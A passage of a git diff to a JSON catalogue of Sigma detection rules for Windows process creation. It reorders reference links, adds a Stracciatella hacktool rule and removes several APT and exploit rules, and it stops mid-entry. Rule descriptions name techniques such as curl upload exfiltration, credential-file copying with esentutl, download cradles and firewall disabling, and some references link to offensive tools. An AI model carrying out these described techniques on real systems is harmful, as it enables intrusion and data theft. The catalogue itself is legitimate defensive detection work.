- "dest-uuid": "b83e166d-13d7-4b52-8677-dff90c548fd7",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "a4eaf250-7dc1-4842-862a-5e71cd59a167",
- "value": "Suspicious RazerInstaller Explorer Subprocess"
- },
{
"description": "Detects child processes of Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary",
"meta": {
@@ -56774,8 +54946,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/mrd0x/status/1463526834918854661",
"https://gist.github.com/nasbench/a989ce64cefa8081bd50cf6ad8c491b5",
+ "https://twitter.com/mrd0x/status/1463526834918854661",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pressanykey_lolbin_execution.yml"
],
"tags": [
@@ -56810,10 +54982,10 @@
"logsource.product": "windows",
"refs": [
"https://www.securitynewspaper.com/2016/11/23/technical-teardown-exploit-malware-hwp-files/",
- "https://twitter.com/cyberwar_15/status/1187287262054076416",
- "https://blog.alyac.co.kr/1901",
"https://www.hybrid-analysis.com/search?query=context:74940dcc5b38f9f9b1a0fea760d344735d7d91b610e6d5bd34533dd0153402c5&from_sample=5db135000388385a7644131f&block_redirect=1",
+ "https://blog.alyac.co.kr/1901",
"https://en.wikipedia.org/wiki/Hangul_(word_processor)",
+ "https://twitter.com/cyberwar_15/status/1187287262054076416",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hwp_exploits.yml"
],
"tags": [
@@ -57019,42 +55191,6 @@
"uuid": "242301bc-f92f-4476-8718-78004a6efd9f",
"value": "DLL Loaded via CertOC.EXE"
},
- {
- "description": "Detects potential exploitation attempts of CVE-2021-41379 (InstallerFileTakeOver), a local privilege escalation (LPE) vulnerability where the attacker spawns a \"cmd.exe\" process as a child of Microsoft Edge elevation service \"elevation_service\" with \"LOCAL_SYSTEM\" rights",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2021/11/22",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_exploit_cve_2021_41379.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.logpoint.com/en/blog/detecting-privilege-escalation-zero-day-cve-2021-41379/",
- "https://www.bleepingcomputer.com/news/microsoft/new-windows-zero-day-with-public-exploit-lets-you-become-an-admin/",
- "https://www.zerodayinitiative.com/advisories/ZDI-21-1308/",
- "https://web.archive.org/web/20220421061949/https://github.com/klinix5/InstallerFileTakeOver",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2021_41379.yml"
- ],
- "tags": [
- "attack.privilege_escalation",
- "attack.t1068"
- ]
- },
- "related": [
- {
- "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "af8bbce4-f751-46b4-8d91-82a33a736f61",
- "value": "Potential CVE-2021-41379 Exploitation Attempt"
- },
{
"description": "Detects usage of \"cdb.exe\" to launch 64-bit shellcode or arbitrary processes or commands from a debugger script file",
"meta": {
@@ -57068,9 +55204,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://twitter.com/nas_bench/status/1534957360032120833",
"https://lolbas-project.github.io/lolbas/OtherMSBinaries/Cdb/",
"https://web.archive.org/web/20170715043507/http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html",
- "https://twitter.com/nas_bench/status/1534957360032120833",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cdb.yml"
],
"tags": [
@@ -57120,8 +55256,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/HiwinCN/HTran",
"https://github.com/cw1997/NATBypass",
+ "https://github.com/HiwinCN/HTran",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_htran_or_natbypass.yml"
],
"tags": [
@@ -57156,8 +55292,8 @@
"logsource.product": "windows",
"refs": [
"https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/",
- "https://www.nirsoft.net/utils/nircmd2.html#using",
"https://www.nirsoft.net/utils/nircmd.html",
+ "https://www.nirsoft.net/utils/nircmd2.html#using",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_nircmd.yml"
],
"tags": [
@@ -57377,41 +55513,6 @@
"uuid": "f64e5c19-879c-4bae-b471-6d84c8339677",
"value": "Webshell Recon Detection Via CommandLine & Processes"
},
- {
- "description": "Detects potential suspicious child processes of \"3CXDesktopApp.exe\". Which could be related to the 3CXDesktopApp supply chain compromise",
- "meta": {
- "author": "Nasreddine Bencherchali (Nextron Systems)",
- "creation_date": "2023/03/29",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_malware_3cx_compromise_susp_children.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/",
- "https://www.crowdstrike.com/blog/crowdstrike-detects-and-prevents-active-intrusion-campaign-targeting-3cxdesktopapp-customers/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_3cx_compromise_susp_children.yml"
- ],
- "tags": [
- "attack.command_and_control",
- "attack.execution",
- "attack.t1218"
- ]
- },
- "related": [
- {
- "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "63f3605b-979f-48c2-b7cc-7f90523fed88",
- "value": "Potential Suspicious Child Process Of 3CXDesktopApp"
- },
{
"description": "Execute VBscript code that is referenced within the *.bgi file.",
"meta": {
@@ -57509,8 +55610,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/erase",
"https://www.joesandbox.com/analysis/509330/0/html#1044F3BDBE3BB6F734E357235F4D5898582D",
+ "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/erase",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_del_greedy_deletion.yml"
],
"tags": [
@@ -57543,9 +55644,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.vmray.com/cyber-security-blog/analyzing-ursnif-behavior-malware-sandbox/",
- "https://www.fireeye.com/blog/threat-research/2020/01/saigon-mysterious-ursnif-fork.html",
"https://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/",
+ "https://www.fireeye.com/blog/threat-research/2020/01/saigon-mysterious-ursnif-fork.html",
+ "https://www.vmray.com/cyber-security-blog/analyzing-ursnif-behavior-malware-sandbox/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_driverquery_recon.yml"
],
"tags": [
@@ -57633,6 +55734,48 @@
"uuid": "80fc36aa-945e-4181-89f2-2f907ab6775d",
"value": "UAC Bypass Using IEInstal - Process"
},
+ {
+ "description": "Detects Stracciatella which executes a Powershell runspace from within C# (aka SharpPick technique) with AMSI, ETW and Script Block Logging disabled based on PE metadata characteristics.",
+ "meta": {
+ "author": "pH-T (Nextron Systems)",
+ "creation_date": "2023/04/17",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ "filename": "proc_creation_win_hktl_stracciatella_execution.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/mgeeky/Stracciatella",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_stracciatella_execution.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.defense_evasion",
+ "attack.t1059",
+ "attack.t1562.001"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "7a4d9232-92fc-404d-8ce1-4c92e7caf539",
+ "value": "HackTool - Stracciatella Execution"
+ },
{
"description": "Detects usage of the \"msedge.exe\" binary as a LOLBIN to download arbitrary file via the CLI",
"meta": {
@@ -57785,7 +55928,7 @@
{
"description": "Detects the execution of the \"curl\" process with \"upload\" flags. Which might indicate potential data exfiltration",
"meta": {
- "author": "Florian Roth (Nextron Systems)",
+ "author": "Florian Roth (Nextron Systems), Cedric MAURUGEON (Update)",
"creation_date": "2020/07/03",
"falsepositive": [
"Scripts created by developers and admins"
@@ -57797,8 +55940,8 @@
"refs": [
"https://twitter.com/d1r4c/status/1279042657508081664",
"https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file",
"https://curl.se/docs/manpage.html",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_curl_fileupload.yml"
],
"tags": [
@@ -57840,8 +55983,8 @@
"logsource.product": "windows",
"refs": [
"https://app.any.run/tasks/40115012-a919-4208-bfed-41e82cb3dadf/",
- "https://twitter.com/bigmacjpg/status/1349727699863011328?s=12",
"http://hyp3rlinx.altervista.org/advisories/Windows_TCPIP_Finger_Command_C2_Channel_and_Bypassing_Security_Software.txt",
+ "https://twitter.com/bigmacjpg/status/1349727699863011328?s=12",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_finger_usage.yml"
],
"tags": [
@@ -57942,8 +56085,8 @@
"logsource.product": "windows",
"refs": [
"https://twitter.com/nao_sec/status/1530196847679401984",
- "https://twitter.com/_JohnHammond/status/1531672601067675648",
"https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/",
+ "https://twitter.com/_JohnHammond/status/1531672601067675648",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt_arbitrary_command_execution.yml"
],
"tags": [
@@ -58101,10 +56244,10 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view",
"https://twitter.com/SBousseaden/status/1211636381086339073",
- "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/",
"https://www.elastic.co/guide/en/security/current/remote-file-copy-to-a-hidden-share.html",
+ "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view",
+ "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_copy_lateral_movement.yml"
],
"tags": [
@@ -58222,8 +56365,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets",
"https://app.any.run/tasks/61a296bb-81ad-4fee-955f-3b399f4aaf4b",
+ "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysprep_appdata.yml"
],
"tags": [
@@ -58322,11 +56465,11 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx",
"https://www.joeware.net/freetools/tools/adfind/",
- "https://thedfirreport.com/2020/05/08/adfind-recon/",
- "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/",
"https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md",
+ "https://thedfirreport.com/2020/05/08/adfind-recon/",
+ "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx",
+ "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/",
"https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_adfind_susp_usage.yml"
],
@@ -58419,8 +56562,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation",
"https://github.com/carlospolop/PEASS-ng",
+ "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_winpeas.yml"
],
"tags": [
@@ -58503,8 +56646,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/subTee/status/1216465628946563073",
"https://gist.github.com/am0nsec/8378da08f848424e4ab0cc5b317fdd26",
+ "https://twitter.com/subTee/status/1216465628946563073",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_task_folder_evasion.yml"
],
"tags": [
@@ -58573,10 +56716,10 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://pentestlab.blog/2020/02/24/parent-pid-spoofing/",
"https://www.ired.team/offensive-security/defense-evasion/parent-process-id-ppid-spoofing",
- "https://www.picussecurity.com/resource/blog/how-to-detect-parent-pid-ppid-spoofing-attacks",
"https://www.virustotal.com/gui/search/filename%253A*spoof*%2520filename%253A*ppid*/files",
+ "https://pentestlab.blog/2020/02/24/parent-pid-spoofing/",
+ "https://www.picussecurity.com/resource/blog/how-to-detect-parent-pid-ppid-spoofing-attacks",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_selectmyparent.yml"
],
"tags": [
@@ -58609,8 +56752,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/",
"https://twitter.com/bohops/status/948061991012327424",
+ "https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cl_invocation.yml"
],
"tags": [
@@ -58643,9 +56786,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-1---disable-microsoft-defender-firewall",
"https://app.any.run/tasks/210244b9-0b6b-4a2c-83a3-04bd3175d017/",
"https://www.winhelponline.com/blog/enable-and-disable-windows-firewall-quickly-using-command-line/",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-1---disable-microsoft-defender-firewall",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_disable.yml"
],
"tags": [
@@ -58734,8 +56877,8 @@
"logsource.product": "windows",
"refs": [
"https://twitter.com/MichalKoczwara/status/1553634816016498688",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-8---windows---disable-the-sr-scheduled-task",
"https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-8---windows---disable-the-sr-scheduled-task",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_disable.yml"
],
"tags": [
@@ -58755,51 +56898,6 @@
"uuid": "9ac94dc8-9042-493c-ba45-3b5e7c86b980",
"value": "Disable Important Scheduled Task"
},
- {
- "description": "Detects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2021/03/09",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_apt_hafnium.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3",
- "https://twitter.com/GadixCRK/status/1369313704869834753?s=20",
- "https://twitter.com/BleepinComputer/status/1372218235949617161",
- "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/",
- "https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_hafnium.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1546",
- "attack.t1053"
- ]
- },
- "related": [
- {
- "dest-uuid": "b6301b64-ef57-4cce-bb0b-77026f14a8db",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "bbb2dedd-a0e3-46ab-ba6c-6c82ae7a9aa7",
- "value": "HAFNIUM Exchange Exploitation Activity"
- },
{
"description": "Detects execution of the builtin \"rmdir\" command in order to delete directories.\nAdversaries may delete files left behind by the actions of their intrusion activity.\nMalware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how.\nRemoval of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.\n",
"meta": {
@@ -58834,49 +56932,6 @@
"uuid": "41ca393d-538c-408a-ac27-cf1e038be80c",
"value": "Directory Removal Via Rmdir"
},
- {
- "description": "Detects a specific PowerShell command line pattern used by the UNC2452 actors as mentioned in Microsoft and Symantec reports",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2021/01/20",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_apt_unc2452_ps.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md#atomic-test-7---create-a-process-using-wmi-query-and-an-encoded-command",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_unc2452_ps.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059.001",
- "attack.t1047"
- ]
- },
- "related": [
- {
- "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "b7155193-8a81-4d8f-805d-88de864ca50c",
- "value": "UNC2452 PowerShell Pattern"
- },
{
"description": "Detects usage of COM objects that can be abused to download files in PowerShell by CLSID",
"meta": {
@@ -58890,8 +56945,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=57",
"https://learn.microsoft.com/en-us/dotnet/api/system.type.gettypefromclsid?view=net-7.0",
+ "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=57",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_download_com_cradles.yml"
],
"tags": "No established tags"
@@ -58970,10 +57025,10 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://app.any.run/tasks/214094a7-0abc-4a7b-a564-1b757faed79d/",
- "https://support.microsoft.com/fr-fr/topic/an-ms-dos-based-program-that-uses-the-ms-dos-protected-mode-interface-crashes-on-a-computer-that-is-running-windows-7-5dc739ea-987b-b458-15e4-d28d5cca63c7",
"https://docs.microsoft.com/en-us/windows/compatibility/ntvdm-and-16-bit-app-support",
"https://app.any.run/tasks/93fe92fa-8b2b-4d92-8c09-a841aed2e793/",
+ "https://app.any.run/tasks/214094a7-0abc-4a7b-a564-1b757faed79d/",
+ "https://support.microsoft.com/fr-fr/topic/an-ms-dos-based-program-that-uses-the-ms-dos-protected-mode-interface-crashes-on-a-computer-that-is-running-windows-7-5dc739ea-987b-b458-15e4-d28d5cca63c7",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_16bit_application.yml"
],
"tags": [
@@ -59050,8 +57105,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/",
"https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment",
+ "https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/",
"https://room362.com/post/2013/2013-06-10-volume-shadow-copy-ntdsdit-domain-hashes-remotely-part-1/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_esentutl_sensitive_file_copy.yml"
],
@@ -59097,8 +57152,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://strontic.github.io/xcyclopedia/library/pnputil.exe-60EDC5E6BDBAEE441F2E3AEACD0340D2.html",
"https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/pnputil-command-syntax",
+ "https://strontic.github.io/xcyclopedia/library/pnputil.exe-60EDC5E6BDBAEE441F2E3AEACD0340D2.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml"
],
"tags": [
@@ -59204,9 +57259,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/",
"https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/",
"https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-5-user-guide.pdf",
+ "https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml"
],
"tags": [
@@ -59226,47 +57281,6 @@
"uuid": "4f154fb6-27d1-4813-a759-78b93e0b9c48",
"value": "Operator Bloopers Cobalt Strike Modules"
},
- {
- "description": "Detects specific process parameters as used by ACTINIUM scheduled task persistence creation.",
- "meta": {
- "author": "Andreas Hunkeler (@Karneades)",
- "creation_date": "2022/02/07",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_apt_actinium_persistence.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_actinium_persistence.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1053",
- "attack.t1053.005"
- ]
- },
- "related": [
- {
- "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "e1118a8f-82f5-44b3-bb6b-8a284e5df602",
- "value": "Potential ACTINIUM Persistence Activity"
- },
{
"description": "Detects usage of wmic to start or stop a service",
"meta": {
@@ -59515,10 +57529,10 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://forensicitguy.github.io/agenttesla-vba-certutil-download/",
- "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil",
"https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/",
+ "https://forensicitguy.github.io/agenttesla-vba-certutil-download/",
"https://twitter.com/egre55/status/1087685529016193025",
+ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil",
"https://lolbas-project.github.io/lolbas/Binaries/Certutil/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains.yml"
],
@@ -59743,8 +57757,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.hybrid-analysis.com/sample/8da5b75b6380a41eee3a399c43dfe0d99eeefaa1fd21027a07b1ecaa4cd96fdd?environmentId=120",
"https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html",
+ "https://www.hybrid-analysis.com/sample/8da5b75b6380a41eee3a399c43dfe0d99eeefaa1fd21027a07b1ecaa4cd96fdd?environmentId=120",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_copy_system32.yml"
],
"tags": [
@@ -59777,9 +57791,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://unit42.paloaltonetworks.com/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/",
"https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/attrib",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md#atomic-test-3---create-windows-system-file-with-attrib",
- "https://unit42.paloaltonetworks.com/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_attrib_system.yml"
],
"tags": [
@@ -59812,8 +57826,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md",
"https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_service_path_modification.yml"
],
"tags": [
@@ -59847,8 +57861,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/cd3690b100a495885c407282d0c94c85f48a8a2e/atomics/T1218.011/T1218.011.md",
"https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52",
+ "https://github.com/redcanaryco/atomic-red-team/blob/cd3690b100a495885c407282d0c94c85f48a8a2e/atomics/T1218.011/T1218.011.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_script_run.yml"
],
"tags": [
@@ -59882,8 +57896,8 @@
"logsource.product": "windows",
"refs": [
"https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37",
- "https://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html",
"https://github.com/redcanaryco/atomic-red-team/blob/1cf4dd51f83dcb0ebe6ade902d6157ad2dbc6ac8/atomics/T1218.001/T1218.001.md",
+ "https://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hh_chm_remote_download_or_execution.yml"
],
"tags": [
@@ -59903,66 +57917,6 @@
"uuid": "f57c58b3-ee69-4ef5-9041-455bf39aaa89",
"value": "Remote CHM File Download/Execution Via HH.EXE"
},
- {
- "description": "Detects automated lateral movement by Turla group",
- "meta": {
- "author": "Markus Neis",
- "creation_date": "2017/11/07",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_apt_turla_commands_critical.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://securelist.com/the-epic-turla-operation/65545/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_turla_commands_critical.yml"
- ],
- "tags": [
- "attack.g0010",
- "attack.execution",
- "attack.t1059",
- "attack.lateral_movement",
- "attack.t1021.002",
- "attack.discovery",
- "attack.t1083",
- "attack.t1135"
- ]
- },
- "related": [
- {
